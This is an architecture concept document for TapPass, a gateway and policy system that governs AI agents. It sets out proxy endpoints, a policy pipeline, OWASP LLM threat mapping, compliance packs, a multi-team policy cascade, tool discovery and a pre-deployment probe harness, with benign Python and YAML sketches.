
TapPass Governed Agents — Reference Architecture


Status: Vision / architecture concept. Central reference for how TapPass governs hosted agents end-to-end.
Date: 2026-05-07
Companion to: tappass-gateway-concept.md, intent-to-policy.md, runtime-tool-discovery.md, enforcement-layers-taxonomy.md, projects-teams-concept.md, tappass-strategy-memo-v3.md.

This document is the integration story — a question-driven walk through the architecture, building from the market pattern that makes governance load-bearing to a fully operable agent fleet.

Canonical terminology. This document uses the canonical names from the Strategy Memo v3 and the architecture ADRs throughout: 3 rings + 2 cross-cutting layers (ADR 0001), Provider + Runtime (ADR 0002), and Compiled Policy organized by aspect (ADR 0003). For concise definitions, see architecture/concepts/index.md.


Fifteen questions, in order of increasing capability. Each section depends only on the ones above; each adds one piece to the value proposition.

| # | Question | Answer (one line) | What this adds |
|---|---|---|---|
| 1 | Why is this needed now? | Every vendor is shipping agents; every customer must govern dozens; existing answers (provider-side, mesh, per-vendor) are fragmented. | The framing |
| 2 | How do we see what an agent does? | Put TapPass on the request path: gateway + 32-step pipeline + audit. Provider-agnostic by design. | Observability |
| 3 | What interactions do we govern, and against what threats? | LLM, tool emissions, MCP both sides, code, harness — covering OWASP LLM Top 10. | Coverage of every surface, with a named threat model |
| 4 | How is policy written, and how do regulations map? | Five authoring layers + pre-built compliance packs (EU AI Act, OWASP LLM, GDPR, HIPAA, PCI-DSS). | Structured authoring + procurement-defensible compliance |
| 5 | How do business users actually use this? | Function presets + category toggles + preview-with-because; NLP interview vision. | 60-second onboarding |
| 6 | How does policy scale across an org with multiple teams? | Three-tier cascade: org floor → project floor → agent overrides. Teams gate who authors what. | Multi-team operability |
| 7 | How do we have a known set of tools — including own-written ones? | Curated catalog + per-tenant extensions + runtime discovery (default-deny). | No surprise tool calls |
| 8 | How do we know the agent obeys policy before we deploy it? | Pre-deployment evaluation harness: 50+ adversarial probes against the policy under test, pass/fail report. | Pre-deployment confidence |
| 9 | How do we enforce policy on the host? | Five enforcement positions, organized as 3 rings + 2 cross-cutting layers: harness / kernel / interpreter (in-process); LLM gateway and MCP broker (between processes). Defense in depth. | On-machine enforcement |
| 10 | How do we unify one policy across every position? | The Compiled Policy — one Rego source, organized by aspect (network/fs/tools/interpreter/budget/compliance), rendered by per-target providers into native config. | One artifact, every chokepoint |
| 11 | How does the Compiled Policy reach the agent's host? | Bootstrap URL + tappass-host init under machine identity. | Deployment seam |
| 12 | How do we keep sandboxes in sync, and detect drift? | Signed unidirectional sync push + monotonic version + behavioral baseline alerts. | Live propagation + drift detection |
| 13 | How do we ensure the agent can't grant itself more? | Privsep + no upward channel + signed payloads + fail-closed TTLs. | Non-escalation |
| 14 | How do we manage three CLIs without confusion? | Three packages, three identities, three audiences — no overlap. | Operability |
| 15 | What does this look like for a real agent? | Reference implementations: Collibra (§15.1), support emailer, code reviewer, refund processor (§15.2). | Concreteness |

About 60% of this architecture already exists in TapPass — the gateway (provider-agnostic), OPA pipeline, OpenShell sandbox, intent-to-policy resolver (live on main today), audit hash-chain. The contribution of this document is the artifact in the middle (the Compiled Policy), the delivery model that keeps it live across a fleet, the org/project/team cascade, the pre-deployment evaluation harness, and the regulatory compliance pack scaffolding.

What it costs to build: ~10–16 engineering weeks for the architectural spine (sized in §14.4), plus ~6–10 weeks for the evaluation harness and compliance packs. Trust posture (SOC 2, data residency) is operational work, taking ~6 months of calendar time.


| Term | Definition |
|---|---|
| Policy | A Rego (OPA) rule set authored by an operator. The single source of truth. |
| Pipeline | The 32-step engine that runs on every governed call. |
| Sandbox | A logical agent installation: identity + a Runtime instance. |
| Sandbox-spec | Named template binding a Policy + a Runtime; produces sandboxes. |
| Compiled Policy | Canonical, signed, versioned IR emitted by the OPA cascade. Content organized by aspect (network / filesystem / tools / interpreter / budget / compliance), not by ring. What providers consume. Operational alias: Keyring (file on disk, SDK class). See ADR 0003. |
| Provider | Per-target plug-in (renderer). Pure function provider(compiled_policy, capabilities) → target_config. Like Terraform providers. See ADR 0002. |
| Runtime | Operator-authored recipe combining one provider per ring + the LLM Gateway / MCP Broker config. The unit of agent deployment. Sandboxes are bound to runtimes. |
| Ring | One of three in-process enforcement positions: harness, kernel, interpreter. |
| Cross-cutting layer | Enforcement position between processes, always compulsory. Two of them: LLM Gateway (every prompt + response) and MCP Broker (every tool call). See ADR 0001. |
| Authoring layer | One of five intent-to-policy layers: function → categories → concerns → capabilities → pipeline. Different axis from enforcement positions; see callout below. |
| Compliance pack | Pre-built bundle of functions/categories/concerns mapped to a regulation (EU AI Act, OWASP LLM, GDPR, …). |
| Org floor | Org-level policy that applies to every project and agent. Cannot be relaxed below. |
| Project floor | Project-level policy. Cannot be relaxed below the org floor. |
| Agent override | Per-agent additions on top of the cascade. Cannot relax org or project floor. |
| Team | The access-control unit. SSO-group-backed. |
| Pre-deployment evaluation | Adversarial probe suite run against an agent before it ships, producing a pass/fail report against the policy. |
| Drift signal | Behavioral deviation in production from the agent's pre-deployment baseline. |
| Sync | Unidirectional, signed channel from TapPass → tappass-host delivering Compiled Policy updates. Push + pull + reconcile. |
| Operator | TapPass admin who authors policy and provisions sandboxes. |
| Host owner | DevOps person owning the machine where agents run. Owns the machine identity that sync trusts. |
| Agent | The agentic application. Read-only consumer of its Compiled Policy. Least-trusted component. |
| tappass | Management CLI — operator's tool. |
| tappass-host | Runtime CLI/daemon — runs on the agent's machine. Daemonized variant of tappass exec. |
| tappass-agent | Client SDK + thin debug CLI — read-only. |

Two axes named "layer": read this once. Authoring layers (intent-to-policy.md) describe how policy is written. Enforcement positions (this concept: 3 rings + 2 cross-cutting layers) describe where policy is applied. They are different axes; the authoring resolver's output is the input to Compiled Policy compilation.


1. Why is this needed now?

The market pattern. Every vendor is shipping agents. Every customer is about to install dozens. Existing governance answers are fragmented. The result: every agent install becomes a procurement gate, and customer audit work scales linearly with the number of agents.

What this adds: the framing. Why TapPass exists, why the architecture is shaped the way it is.

What's still missing: anything actionable. We have to put TapPass on the request path before any of this can happen. §2.

  1. Every SaaS vendor is shipping agents. Collibra is researching agents for catalog management. Salesforce, ServiceNow, Atlassian, GitHub, Notion — all of them are or will be packaging AI agents that act on customer data. The agent is becoming a feature, not a separate product.

  2. Every developer machine runs agentic IDEs. Claude Code, Cursor, Cline, Windsurf. These tools make API calls with personal keys, with filesystem and repo access. Every developer laptop is a potential exfiltration surface.

  3. Most enterprises don't even know how many agents they already have. Shadow agents proliferate before governance arrives — a script with OPENAI_API_KEY, a notebook that calls Anthropic, a Cursor install with autonomous tool access. The operator's first question is "what agents do I already have?" before they can even ask "how do I govern them?"

  4. Every CISO is staring at this and asking "what's our governance story?" The honest answer for most enterprises today is we don't have one.

Within 18 months, this becomes a hard gate. Every agent install will require an answer to:

  • "Show me which agents touched which resources."
  • "Prove they couldn't have touched the others."
  • "Show me what this agent will do before I let it loose on production." (See §8.)
  • "Kill this agent's session if it loops or behaves unexpectedly."
  • "Give me an EU AI Act / SOC 2 / OWASP LLM compliance attestation for this deployment." (See §4.3 and §17.)

Without an answer, every install is a procurement gate. With a fragmented per-vendor answer, the customer's compliance work scales linearly with the number of agents installed — unsustainable.

1.3 Why TapPass, not the obvious alternatives


Three properties no existing vendor offers together:

  • LLM provider agnostic. Same governance applies whether the customer is on OpenAI, Anthropic, Cohere, Mistral, Azure OpenAI, or self-hosted Llama. Locking governance to one provider locks the customer to that provider — which no CISO will accept. TapPass speaks OpenAI-compatible, Anthropic-native, and MCP wire formats, routing to 100+ providers via LiteLLM (§2.1).
  • Vendor neutral. A Collibra agent, a Salesforce agent, and a custom internal agent are all governable from one chokepoint. Per-vendor governance reproduces the problem at meta-level.
  • End-to-end. From the LLM call all the way down to network egress on the agent's host. Anything less leaves a layer where the agent can do something unsanctioned. §3 enumerates the surfaces; §9 the enforcement layers.

The rest of this document is how we deliver them.


2. How do we see what an agent does?

The foundation. TapPass sits on the AI request path. Every LLM call and every tool call passes through a 32-step pipeline with hash-chained audit. Provider-agnostic by design. Already shipped as tappass/gateway/.

What this adds: observability of every governed call. PII / secret / exfil detection. Audit. Quotas. Capability tokens. The same plumbing works whether the customer is on OpenAI today or Llama next quarter.

What's still missing: governance over tool execution itself, the agent's runtime environment, and what tools it's allowed to call. Subsequent sections close those gaps.

2.1 The proxy primitive (live today, provider-agnostic)

| Endpoint | Format | Compatible clients | Provider routing |
|---|---|---|---|
| POST /v1/chat/completions | OpenAI | OpenAI SDK, LangChain, LlamaIndex, Cursor, curl | OpenAI, Azure OpenAI, Mistral, Cohere, local models, 80+ via LiteLLM |
| POST /v1/messages | Anthropic | Claude Code, Cline, Anthropic SDK | Anthropic, Bedrock Anthropic, Vertex Anthropic |
| POST /v1/tools/execute | Tool exec | TapPass SDK govern() wrapper | (provider-independent) |
| MCP server | MCP | Claude Code, agent wrappers, any MCP-aware tool | (provider-independent) |

One policy engine. One audit log. One vault. Putting TapPass on the path is as cheap as setting ANTHROPIC_BASE_URL=https://api.tappass.ai/v1. The customer does not have to choose a provider before adopting TapPass; they can switch providers later without changing their governance posture.

A 32-step engine runs on every governed call: PII / secret / exfil detectors, capability-token validation, audit signing (ES256 mandates, hash-chained), quota enforcement, response filtering. This engine is exactly the runtime substrate that the intent-to-policy briefing targets.
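A hash chain is what makes the audit log tamper-evident: each entry's digest covers the previous entry's digest, so editing any past record breaks every link after it. The sketch below shows only that chaining idea, using SHA-256 from the Python standard library; the ES256 signatures the pipeline also applies are omitted, and the record fields (`step`, `decision`) are hypothetical rather than TapPass's audit schema.

```python
import hashlib
import json
from dataclasses import dataclass, field

GENESIS = "0" * 64  # stands in for the "previous hash" of the very first entry


def _digest(prev_hash: str, record: dict) -> str:
    # Canonical JSON (sorted keys, no whitespace) so a record always hashes identically.
    payload = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + payload).encode("utf-8")).hexdigest()


@dataclass
class AuditLog:
    entries: list = field(default_factory=list)  # list of (record, digest) tuples

    def append(self, record: dict) -> str:
        prev = self.entries[-1][1] if self.entries else GENESIS
        digest = _digest(prev, record)
        self.entries.append((record, digest))
        return digest

    def verify(self) -> bool:
        # Recompute every link; an edited or reordered entry breaks the chain.
        prev = GENESIS
        for record, digest in self.entries:
            if _digest(prev, record) != digest:
                return False
            prev = digest
        return True
```

In a real deployment the head digest would also be signed, so that truncating the tail of the log is detectable as well.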


3. What interactions do we govern, and against what threats?


Scope: every surface, mapped to a named threat model. Five interaction surfaces, each with its own enforcement primitive at its own layer. Coverage is mapped to OWASP LLM Top 10 so customers have a procurement-defensible threat list.

What this adds: clarity that "governance" means more than LLM proxying — and that we know exactly what threats we defend against (and which we don't, by design).

| Interaction | What we govern | Layer | Enforcement primitive |
|---|---|---|---|
| LLM call (agent → provider) | Prompt content, response content, tool emissions in the response | gateway | Pipeline detections + capability tokens |
| Tool execution — outbound (agent → external tool, e.g. Collibra MCP) | Which tools, with which args, in which session | mcp (TapPass MCP proxy) | Pipeline steps schema_acl, loop_guard, runtime-tool-discovery check |
| Tool execution — inbound (external → agent's MCP) | What other systems can ask the agent to do | mcp (TapPass MCP server) | Capability tokens (ES256), per-tool constraint engine |
| Code execution (agent runs Python, shell) | Imports, binaries, executor network | codemode | Executor profile (Monty-style allow/deny) |
| Agent-runtime hooks (Claude Code-style settings.json) | Pre-tool-use hooks, allow/deny at runtime level | harness | Runtime config file in the sandbox |
| Host-level activity (filesystem, network, processes) | What the agent's process can do at all | kernel | OpenShell — Landlock + L7 network egress + credential hiding |

3.2 Threat coverage — mapped to OWASP LLM Top 10

| OWASP LLM threat (2023 edition numbering) | Where TapPass catches it |
|---|---|
| LLM01 Prompt Injection | Pipeline detect_prompt_injection (gateway) |
| LLM02 Insecure Output Handling | Pipeline scan_output (gateway); tools_denied capability scoping |
| LLM03 Training Data Poisoning | Out of scope (provider-side concern; mitigated by the zero-training policy in §17) |
| LLM04 Model Denial of Service | Quotas + loop_guard pipeline step (mcp); rate-limited capability tokens |
| LLM05 Supply Chain Vulnerabilities | Runtime tool discovery default-deny (§7); denied_imports codemode profile |
| LLM06 Sensitive Information Disclosure | detect_pii, detect_secrets, scan_output (gateway); kernel egress allowlist |
| LLM07 Insecure Plugin Design | Capability tokens + per-tool constraint engine (mcp); schema_acl |
| LLM08 Excessive Agency | Capability tokens (gateway); forbidden_capabilities floor (§4.2); loop_guard (mcp) |
| LLM09 Overreliance | Out of architectural scope (an application-quality concern; pre-deployment eval flags it — §8) |
| LLM10 Model Theft | Egress allowlist (kernel); rate-limited tokens; audit |

Plus TapPass-specific threats not in OWASP LLM:

| Threat | Where TapPass catches it |
|---|---|
| Loop / runaway agent | loop_guard pipeline step + session kill |
| Tool catalog drift / shadow tools | Runtime tool discovery default-deny + review queue (§7) |
| Cross-sandbox data leakage | Separate mount namespaces, separate UIDs, separate sync channels (§13) |
| Agent self-escalation | Privsep + signed sync + no upward channel (§13) |
| Behavioral drift in production | Drift detection signals (§12.4) |

This is the procurement-conversation answer to "what threats does this defend against?"


4. How is policy written, and how do regulations map?


Structured authoring + compliance packs. Five authoring layers (intent-to-policy) translate operator intent into pipeline config. Pre-built compliance packs bundle the right functions/categories/concerns to satisfy specific regulations.

What this adds: a way for compliance, product, and engineering to share a vocabulary — and a one-click path to "my deployment satisfies EU AI Act / OWASP LLM Top 10 / GDPR baseline."

What's still missing: an experience that a non-engineer can complete in 60 seconds. §5.

| Layer | Question | Owned by | Example |
|---|---|---|---|
| L0 Function | What is this agent for? | Product / Compliance | refund_processor |
| L1 Categories | What kind of data? | UX | customer_pii, payment_data, eu_residents |
| L2 Concerns | What risks / regulations? | Compliance | data_leak, pci_dss, gdpr_required |
| L3 Capabilities | What can each tool do? | Integrations | external_messaging, pci_dss_scope |
| L4 Effective pipeline | (computed) | Resolver | enabled detectors + tool constraints + Rego instances |

Plus L5 Manual overlay — operator-specific tweaks that stack on top with strictest-wins merge. The resolver is ~40 lines and produces a normal pipeline config — no added latency on the hot path.
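A minimal sketch of the L0 → L4 resolution, assuming small in-memory catalogs. Every catalog entry below (the refund_processor function, the category → concern and concern → detector maps) is hypothetical illustration data, not the shipped catalog, and the sketch skips the L3 capability layer, tool constraints, and Rego instances. It does keep, for each effective detector, the chain that produced it, which is the raw material for the because trail described in §5.

```python
# Hypothetical catalogs; names mirror the examples in the table above.
FUNCTIONS = {
    "refund_processor": {"categories": ["customer_pii", "payment_data"]},
}
CATEGORY_CONCERNS = {
    "customer_pii": ["data_leak"],
    "payment_data": ["pci_dss"],
    "eu_residents": ["gdpr_required"],
}
CONCERN_DETECTORS = {
    "data_leak": ["detect_pii", "scan_output"],
    "pci_dss": ["detect_secrets"],
    "gdpr_required": ["detect_pii"],
}


def resolve(function: str, extra_categories=()) -> dict:
    """Return {detector: [because-trail, ...]} for the effective pipeline (L4)."""
    # L0 preset supplies default categories; operator toggles add more (L1).
    categories = list(FUNCTIONS[function]["categories"]) + list(extra_categories)
    effective = {}
    for category in categories:
        for concern in CATEGORY_CONCERNS.get(category, []):           # L1 -> L2
            for detector in CONCERN_DETECTORS.get(concern, []):       # L2 -> L4
                trail = (f"{detector} <- concern:{concern} "
                         f"<- category:{category} <- function:{function}")
                effective.setdefault(detector, []).append(trail)
    return effective
```

A detector reached through two concerns (detect_pii via both data_leak and gdpr_required) is enabled once but carries both trails, so the preview can explain every reason it is on.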

4.2 Forbidden capabilities — the absolute floor


When a function declares forbidden_capabilities: [code_execution, sor_arbitrary_write], no operator override, no manual edit, no exception request can give that agent those capabilities. Lifting them requires editing the function YAML — a separately-audited Compliance action.
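One way to make this floor absolute is to check it last, against the fully merged capability set, reading the forbidden list only from the function spec so that no override path can edit it. A hypothetical sketch; the function and capability names come from the example above, and rejecting (rather than silently stripping) is a design assumption that makes override attempts visible in audit.

```python
class ForbiddenCapabilityError(ValueError):
    """Raised when any layer tries to grant a capability the function forbids."""


def apply_forbidden_floor(function_spec: dict, granted: set) -> set:
    # The floor comes only from the function YAML; overrides never see or edit it.
    forbidden = set(function_spec.get("forbidden_capabilities", []))
    violations = granted & forbidden
    if violations:
        raise ForbiddenCapabilityError(f"forbidden by function: {sorted(violations)}")
    return granted
```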

4.3 Compliance packs — pre-built regulation bundles


A compliance pack is a curated bundle of functions, categories, concerns, capabilities, and Rego templates that, when applied to a sandbox-spec, produces a pipeline that satisfies a specific regulation or framework. Operators tick one box; the resolver expands into the right rules.

| Pack | What it bundles | Applies to | Status |
|---|---|---|---|
| EU AI Act (high-risk) | Concerns: gdpr_required, data_residency, audit_required, human_oversight_required. Categories: eu_residents, customer_pii. Mandatory audit_signing, require_human_approval for high-risk operations. Forbidden: undocumented automated decisions. | Any sandbox-spec | New (this concept) |
| OWASP LLM Top 10 | Concerns covering the OWASP categories mapped in §3.2 (LLM03 and LLM09 are out of scope there). Detectors enabled: detect_pii, detect_secrets, detect_prompt_injection, scan_output. Pipeline step: loop_guard. | Any sandbox-spec | New (this concept) |
| GDPR baseline | Concerns: gdpr_required, data_residency: eu. Constraints: external_messaging excludes *.us, *.cn. Right-to-erasure attestation in audit. | Any sandbox-spec | New |
| PCI-DSS scope | Concerns: pci_dss, audit_required. Constraints on financial tools (max amounts, approval thresholds). | Sandbox-specs handling payment data | New |
| HIPAA | Concerns: hipaa, data_leak, access_control_strict. PHI-mode detect_pii. Constraints on external_messaging.destination. | Sandbox-specs handling health data | New |
| NIS2 / DORA | Concerns: audit_required, incident_reporting, business_continuity. Mandatory audit retention; alerting hooks. | Regulated EU industries | New |

A pack ships as a YAML bundle; applying one is tappass policy apply --pack eu-ai-act. Packs compose — the operator can apply EU AI Act + GDPR baseline + OWASP LLM Top 10 to one sandbox-spec; the resolver merges via strictest-wins.

Why this matters: for an EU buyer (Collibra, regulated industries), the procurement-defensible path is "we tick three boxes, and the deployment is EU AI Act + GDPR + OWASP LLM compliant." Without packs, every customer assembles compliance from scratch. With packs, the same policy is reused across the customer base — and the same policy can be certified once by a third party, with that certification inherited by every deployment that applies it.


5. How do business users actually use this?


60-second onboarding. Function presets do most of the work. Category toggles fill in the rest. Compliance packs add regulatory floors with one click. Preview shows every rule with a "because" trail.

What this adds: the people who own governance decisions can use the system without an engineer.

What's still missing: a way for multiple teams to author and scope policy without stepping on each other. §6.

| Step | Question | Time |
|---|---|---|
| 1 | "What kind of agent is this?" — function picker | ~10s |
| 2 | "Anything special about your data?" — categories, pre-ticked from function | ~20s |
| 3 | "Any compliance requirements?" — checkboxes for compliance packs (EU AI Act, OWASP LLM, GDPR, …) | ~10s |
| 4 | Preview & commit — every line shows its because trail | ~30s |

Every effective rule carries a chain back to the operator action that produced it — including which compliance pack contributed:

detect_pii (block)
⤷ Concern: data_leak
⤷ Category: customer_pii ✓ ticked at onboarding
⤷ Compliance pack: eu-ai-act ✓ ticked at onboarding
⤷ Org floor: ✓ inherited from "acme-baseline"
Function: refund_processor
Set up by: jens@acme.com on 2026-04-25 14:32 UTC

In the NLP interview (the vision noted in the overview), the same resolver runs. The LLM is only a typed-selection helper that maps prose to a small, closed-set decision: which function, which categories, which compliance packs, which capabilities. It never produces Rego and never names a pipeline step. Every output is a typed selection from a closed catalog, so no hallucination can write a policy that silently allows something it shouldn't.
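The closed-set guarantee can be enforced mechanically: whatever the LLM returns is parsed and checked against the catalog before the resolver ever sees it, and anything outside the catalog is rejected rather than passed through. A minimal sketch; the JSON answer shape and the catalog contents are assumptions for illustration.

```python
import json

# Hypothetical closed catalogs the interview is allowed to select from.
CATALOG = {
    "function": {"refund_processor", "support_emailer", "code_reviewer"},
    "categories": {"customer_pii", "payment_data", "eu_residents"},
    "packs": {"eu-ai-act", "owasp-llm", "gdpr"},
}


def parse_selection(llm_output: str) -> dict:
    """Validate an LLM's JSON answer; every field and value must come from CATALOG."""
    data = json.loads(llm_output)
    if not isinstance(data, dict):
        raise ValueError("expected a JSON object")
    unknown_keys = set(data) - set(CATALOG)
    if unknown_keys:  # e.g. an attempt to smuggle in raw Rego
        raise ValueError(f"unexpected fields: {sorted(unknown_keys)}")
    fn = data.get("function")
    if not isinstance(fn, str) or fn not in CATALOG["function"]:
        raise ValueError(f"unknown function: {fn!r}")
    selection = {"function": fn}
    for key in ("categories", "packs"):
        values = data.get(key, [])
        if not isinstance(values, list):
            raise ValueError(f"{key} must be a list")
        bad = [v for v in values if not isinstance(v, str) or v not in CATALOG[key]]
        if bad:
            raise ValueError(f"unknown {key}: {bad}")
        selection[key] = sorted(set(values))
    return selection
```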


6. How does policy scale across an org with multiple teams?


Three-tier cascade. Org floor → project floor → agent overrides. Strictest-wins merge. Teams gate who authors at which level.

What this adds: the architecture works for an org with 10 teams shipping 50 agents.

What's still missing: the catalog of tools the cascade refers to. §7.

ORG FLOOR (the bottom; applies to every project and agent)
│ authored by org admins; cannot be relaxed below
│ typical content: compliance pack(s), forbid PII exfiltration, audit signing
▼
PROJECT FLOOR (per-project additions)
│ authored by project admins; cannot be relaxed below the org floor
│ typical content: project schemas, integrations, tool sets
▼
AGENT OVERRIDES (per-agent specifics)
  authored by agent owners; cannot relax org or project floors
  typical content: typical-session shape, per-tool constraints, exceptions

Strictest-wins merge: enabled: true always wins, block > notify > log, numeric ceilings (lower wins), contains (union — logical AND).
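The merge rules above can be sketched as a field-by-field fold over the three tiers. The rule shape (`enabled`, `action`, `max`, `contains`) and the `introduced_by` provenance field are assumptions made for illustration; the property that matters is that every operator is monotone, so no later tier can yield a looser result than an earlier one.

```python
SEVERITY = {"log": 0, "notify": 1, "block": 2}  # block > notify > log


def merge_rule(a: dict, b: dict) -> dict:
    """Strictest-wins merge of two versions of the same rule."""
    merged = {"enabled": a.get("enabled", False) or b.get("enabled", False)}  # true wins
    actions = [x for x in (a.get("action"), b.get("action")) if x is not None]
    if actions:
        merged["action"] = max(actions, key=SEVERITY.__getitem__)  # more severe wins
    ceilings = [x for x in (a.get("max"), b.get("max")) if x is not None]
    if ceilings:
        merged["max"] = min(ceilings)  # lower numeric ceiling wins
    # contains: union of constraints, all of which must hold (logical AND)
    merged["contains"] = set(a.get("contains", ())) | set(b.get("contains", ()))
    return merged


def merge_cascade(tiers) -> dict:
    """tiers: [(level_name, {rule_name: rule}), ...] ordered org -> project -> agent."""
    effective = {}
    for level, rules in tiers:
        for name, rule in rules.items():
            if name in effective:
                prior = effective[name]
                effective[name] = {**merge_rule(prior, rule), "introduced_by": prior["introduced_by"]}
            else:
                effective[name] = {**merge_rule({}, rule), "introduced_by": level}
    return effective
```

Note that an agent trying to downgrade detect_pii to `log` simply has no effect: `max` over severities keeps the org's `block`.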

A team is the membership primitive (see projects-teams-concept.md). SSO-group-backed.

| Role | Org level | Project level | Agent level |
|---|---|---|---|
| Org admin | Author org floor, manage providers, MCP registry | Inherits project rights | Inherits agent rights |
| Project admin | | Author project floor, manage agents | Inherits agent rights |
| Agent owner | | | Author agent overrides, provision sandboxes, view this agent's audit |
| Auditor | View org-wide audit | View project audit | View agent audit (read-only) |
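Read as code, the authoring column of the role table is a small ordered check: a role may author at its own level and every level beneath it, and auditors author nothing. The role and level identifiers are assumptions for illustration; in TapPass, role membership comes from SSO-backed teams, and this sketch ignores scoping (which project or agent a given admin owns).

```python
LEVELS = ["org", "project", "agent"]  # top to bottom of the cascade

# Highest level at which each role may author; lower levels are inherited.
AUTHOR_FROM = {"org_admin": "org", "project_admin": "project", "agent_owner": "agent"}


def can_author(role: str, level: str) -> bool:
    top = AUTHOR_FROM.get(role)  # auditors and unknown roles have no authoring rights
    if top is None:
        return False
    return LEVELS.index(level) >= LEVELS.index(top)
```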

6.3 How the cascade interacts with the Compiled Policy


The policy compiler merges org + project + agent policy before producing the Compiled Policy. The runtime sees one merged effective pipeline. The because-trail records which level introduced each rule.


7. How do we have a known set of tools — including own-written ones?


Catalog + discovery + per-tenant extensions. Curated library + operator-extensible additions + default-deny review queue for everything else.

What this adds: the agent can never call a tool TapPass hasn't seen. Vendor SaaS, internal MCP server, custom Python — all the same.

What's still missing: before the agent ships, how do we know the policy actually constrains it as expected? §8.

Each tool has capabilities (external_messaging, code_execution, pci_dss_scope) and slot bindings (destination_param, content_param, amount_param). Concerns target capabilities; the catalog binds capabilities to concrete tools. So "GDPR requires external_messaging.destination excludes *.us, *.cn" applies automatically to every tool with external_messaging.
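Because concerns target capabilities rather than tools, one constraint covers every tool carrying that capability. A sketch of the binding with fnmatch-style domain patterns; the catalog rows (including the hypothetical vendor_mail.send), the slot names, and the "take the part after @" destination extraction are simplifying assumptions.

```python
from fnmatch import fnmatch

# Hypothetical catalog rows: capabilities plus the slot that holds the destination.
CATALOG = {
    "acme_dispatch_email": {"capabilities": {"external_messaging"}, "destination_param": "recipient"},
    "vendor_mail.send": {"capabilities": {"external_messaging"}, "destination_param": "to"},
    "collibra.search": {"capabilities": set(), "destination_param": None},
}

# A GDPR-style concern, written once against the capability, not per tool.
CONSTRAINTS = {"external_messaging": {"destination_excludes": ["*.us", "*.cn"]}}


def destination_host(value: str) -> str:
    # Simplification: domain part of an address, otherwise the value itself.
    return value.rsplit("@", 1)[-1].lower()


def check_call(tool: str, args: dict) -> bool:
    entry = CATALOG.get(tool)
    if entry is None:
        return False  # unknown tool: default-deny (see §7.2)
    for cap in entry["capabilities"]:
        rule = CONSTRAINTS.get(cap)
        param = entry["destination_param"]
        if rule and param:
            value = args.get(param)
            if value is None:
                return False  # a constrained slot must be present
            host = destination_host(value)
            if any(fnmatch(host, pattern) for pattern in rule["destination_excludes"]):
                return False
    return True
```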

7.2 Runtime tool discovery (default-deny + review queue)


Every unknown tool the agent emits is captured as a discovered row, blocked at runtime, surfaced in /app/catalog/discovered. Operator approves / refines / denies. Auto-approval lanes (e.g., tools advertised by a registered MCP server) are opt-in.
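The discovery loop is a catalog lookup with a deny-by-default fallthrough: known tools proceed to the pipeline, while unknown ones are recorded once, counted, and blocked until an operator acts. A minimal sketch; the `DiscoveredTool` record, its status values, and the opt-in auto-approval rule for registered MCP servers are hypothetical stand-ins for the /app/catalog/discovered queue.

```python
from dataclasses import dataclass


@dataclass
class DiscoveredTool:
    name: str
    source: str               # advertising MCP server, or "agent-emitted"
    status: str = "pending"   # pending -> approved | denied
    hits: int = 0             # how often the agent tried to call it


class ToolGate:
    def __init__(self, catalog, registered_mcp=(), auto_approve_registered=False):
        self.catalog = set(catalog)
        self.registered_mcp = set(registered_mcp)
        self.auto_approve_registered = auto_approve_registered  # opt-in lane
        self.discovered = {}

    def allow(self, tool: str, source: str) -> bool:
        if tool in self.catalog:
            return True
        row = self.discovered.setdefault(tool, DiscoveredTool(tool, source))
        row.hits += 1
        if self.auto_approve_registered and source in self.registered_mcp:
            self.review(tool, approve=True)
            return True
        return False  # default-deny: blocked until an operator approves

    def review(self, tool: str, approve: bool) -> None:
        row = self.discovered[tool]
        row.status = "approved" if approve else "denied"
        if approve:
            self.catalog.add(tool)
```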

  • Outbound (agent → external MCP): TapPass MCP proxy forwards after pipeline checks. Credentials stay in TapPass vault.
  • Inbound (external → agent's MCP): TapPass MCP server governs every invocation with capability tokens.

7.4 Own-written tools and internal MCP servers


The curated catalog covers ~30 well-known SaaS integrations. Customers extend three ways without forking:

Pattern A — add a brand-new tool. Per-tenant tools.yaml:

tools:
  acme_dispatch_email:
    capabilities: [external_messaging]
    slots: { destination_param: recipient, content_param: payload }

Pattern B — extend a known tool. "Our Slack is internal-only; reclassify."

tools:
  acme_internal_slack:
    extends: slack.send_message
    capabilities: [-external_messaging, +internal_messaging]

Pattern C — per-agent override. Tighten classification for one agent.

Internal MCP servers. tappass mcp register --name acme-internal --url https://mcp.acme.local --auth bearer:vault://acme-mcp. Tools advertised by registered MCPs can be auto-approved; credentials stay in TapPass vault.

Custom Python functions. LangChain @tool decorators are discovered via runtime discovery — same loop, same audit boundary.

The catalog is the universe; everything outside is default-deny.
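Patterns A and B can be resolved into one flat tenant catalog before any policy is applied: a new entry starts empty, an `extends` entry starts from its parent, and `-`/`+` prefixes remove or add capabilities. A sketch assuming the tools.yaml shown above has already been parsed into dicts and that entries are resolved in order; the base row for slack.send_message (including its slot names) is hypothetical.

```python
BASE_CATALOG = {
    "slack.send_message": {
        "capabilities": {"external_messaging"},
        "slots": {"destination_param": "channel", "content_param": "text"},
    },
}


def resolve_tenant_tools(base: dict, tenant: dict) -> dict:
    """Merge per-tenant tools.yaml entries (already parsed) into a flat catalog."""
    # Copy the base so tenant edits never mutate the shared curated catalog.
    catalog = {name: {"capabilities": set(e["capabilities"]), "slots": dict(e["slots"])}
               for name, e in base.items()}
    for name, entry in tenant.items():
        if "extends" in entry:
            parent = catalog[entry["extends"]]  # Pattern B: start from a known tool
        else:
            parent = {"capabilities": set(), "slots": {}}  # Pattern A: brand-new tool
        caps = set(parent["capabilities"])
        for cap in entry.get("capabilities", []):
            if cap.startswith("-"):
                caps.discard(cap[1:])      # drop an inherited capability
            else:
                caps.add(cap.lstrip("+"))  # add a capability ("+" is optional)
        slots = {**parent["slots"], **entry.get("slots", {})}
        catalog[name] = {"capabilities": caps, "slots": slots}
    return catalog
```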


8. How do we know the agent obeys policy before we deploy it?


Pre-deployment evaluation harness. Run 50+ adversarial probes against the agent under the policy under test. Produce a quantitative pass/fail report. Gate the release on it.

What this adds: the answer to "is my agent safe to ship?" — without this, the policy author hopes the policy holds; with this, they know. This is the procurement question every CISO asks (and what Giskard centers on).

What's still missing: runtime enforcement once the agent does ship. §9.

inputs:
  • the agent (its tappass-agent SDK + its tasks)
  • the candidate policy (function + categories + compliance packs + cascade)
  • a probe suite (TapPass-curated; per-pack extensions)
run:
  • spin up an ephemeral sandbox with the candidate Compiled Policy
  • execute each probe against the agent
  • collect: did the agent emit denied tool calls? did detections fire? did
    loop_guard trigger? did the agent leak PII / secrets? did it follow
    prompt-injection bait? did it over-refuse legitimate prompts?
output:
  • per-probe pass/fail with replay
  • aggregate score against each compliance pack
  • regression delta vs. prior agent version
